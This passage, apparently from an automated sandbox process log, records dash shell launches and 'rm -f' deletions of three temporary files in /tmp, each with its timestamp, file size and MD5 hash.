                                            Start date (UTC):19/04/2024
                                            Path:/usr/bin/dash
                                            Arguments:-
                                            File size:129816 bytes
                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                            Start time (UTC):11:15:15
                                            Start date (UTC):19/04/2024
                                            Path:/usr/bin/rm
                                            Arguments:rm -f /tmp/tmp.1xqirBlELv /tmp/tmp.LwJeESmqlD /tmp/tmp.SrqeG7vBqM
                                            File size:72056 bytes
                                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                            Start time (UTC):11:15:15
                                            Start date (UTC):19/04/2024
                                            Path:/usr/bin/dash
                                            Arguments:-
                                            File size:129816 bytes
                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                            Start time (UTC):11:15:15
                                            Start date (UTC):19/04/2024
                                            Path:/usr/bin/rm
                                            Arguments:rm -f /tmp/tmp.1xqirBlELv /tmp/tmp.LwJeESmqlD /tmp/tmp.SrqeG7vBqM
                                            File size:72056 bytes
                                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b